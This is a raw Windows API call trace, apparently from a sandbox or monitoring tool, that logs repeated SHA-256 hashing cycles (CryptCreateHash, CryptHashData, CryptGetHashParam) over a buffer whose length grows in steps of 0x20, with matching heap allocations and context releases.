	[0192.560] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301f90
	[0192.560] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301f90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301f90, pdwDataLen=0x1283b0) returned 1
	[0192.560] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.560] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.560] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.560] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.560] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0192.560] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301fb8
	[0192.561] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301fb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301fb8, pdwDataLen=0x1283b0) returned 1
	[0192.561] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.561] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.561] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.561] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.561] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0192.561] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301fe0
	[0192.561] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301fe0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301fe0, pdwDataLen=0x1283b0) returned 1
	[0192.561] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.561] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.561] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.562] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.562] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0192.562] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302008
	[0192.562] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302008, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302008, pdwDataLen=0x1283b0) returned 1
	[0192.562] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.562] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.562] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.563] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.563] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0192.563] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302030
	[0192.563] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302030, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302030, pdwDataLen=0x1283b0) returned 1
	[0192.563] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.563] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.563] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.564] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.564] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0192.564] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.564] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302058
	[0192.564] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302058, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302058, pdwDataLen=0x1283b0) returned 1
	[0192.564] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.564] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.564] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.564] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.565] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0192.565] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302080
	[0192.565] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302080, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302080, pdwDataLen=0x1283b0) returned 1
	[0192.565] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.565] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.565] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.565] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.565] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0192.565] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.565] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23020a8
	[0192.565] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23020a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23020a8, pdwDataLen=0x1283b0) returned 1
	[0192.565] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.566] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.566] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.566] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.566] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0192.566] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.566] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23020d0
	[0192.566] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23020d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23020d0, pdwDataLen=0x1283b0) returned 1
	[0192.566] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.566] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.566] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.567] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.567] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0192.568] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23020f8
	[0192.568] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23020f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23020f8, pdwDataLen=0x1283b0) returned 1
	[0192.568] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.568] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.568] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.568] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.568] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0192.568] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.568] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302120
	[0192.568] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302120, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302120, pdwDataLen=0x1283b0) returned 1
	[0192.568] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.568] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.569] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.569] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.569] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0192.569] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.569] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302148
	[0192.569] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302148, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302148, pdwDataLen=0x1283b0) returned 1
	[0192.569] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.569] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.569] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.570] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.570] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0192.570] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.570] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302170
	[0192.570] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302170, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302170, pdwDataLen=0x1283b0) returned 1
	[0192.570] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.570] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.570] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.571] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.571] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0192.571] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.571] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302198
	[0192.571] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302198, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302198, pdwDataLen=0x1283b0) returned 1
	[0192.571] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.571] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.571] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.572] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.572] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0192.572] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23021c0
	[0192.572] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23021c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23021c0, pdwDataLen=0x1283b0) returned 1
	[0192.572] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.572] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.572] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.572] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.572] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0192.572] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23021e8
	[0192.573] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23021e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23021e8, pdwDataLen=0x1283b0) returned 1
	[0192.573] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.573] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.573] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.573] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.573] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0192.573] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.573] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302210
	[0192.573] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302210, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302210, pdwDataLen=0x1283b0) returned 1
	[0192.573] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.573] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.573] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.574] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.574] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0192.574] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.574] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302238
	[0192.574] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302238, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302238, pdwDataLen=0x1283b0) returned 1
	[0192.574] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.574] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.574] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.575] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.575] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0192.575] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.575] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302260
	[0192.575] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302260, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302260, pdwDataLen=0x1283b0) returned 1
	[0192.575] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.575] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.575] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.576] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.576] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0192.576] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.576] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302288
	[0192.576] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302288, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302288, pdwDataLen=0x1283b0) returned 1
	[0192.576] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.576] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.576] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.576] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.576] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0192.576] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23022b0
	[0192.577] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23022b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23022b0, pdwDataLen=0x1283b0) returned 1
	[0192.577] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.577] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.577] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.577] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.577] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0192.577] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.577] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23022d8
	[0192.577] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23022d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23022d8, pdwDataLen=0x1283b0) returned 1
	[0192.577] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.577] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.577] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.578] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.578] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0192.578] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.578] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302300
	[0192.578] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302300, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302300, pdwDataLen=0x1283b0) returned 1
	[0192.578] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.578] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.578] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.579] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.579] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0192.579] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.579] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302328
	[0192.579] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302328, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302328, pdwDataLen=0x1283b0) returned 1
	[0192.579] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.579] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.579] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.580] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.580] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0192.580] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302350
	[0192.580] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302350, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302350, pdwDataLen=0x1283b0) returned 1
	[0192.580] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.580] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.580] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.580] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.580] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0192.581] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302378
	[0192.581] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302378, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302378, pdwDataLen=0x1283b0) returned 1
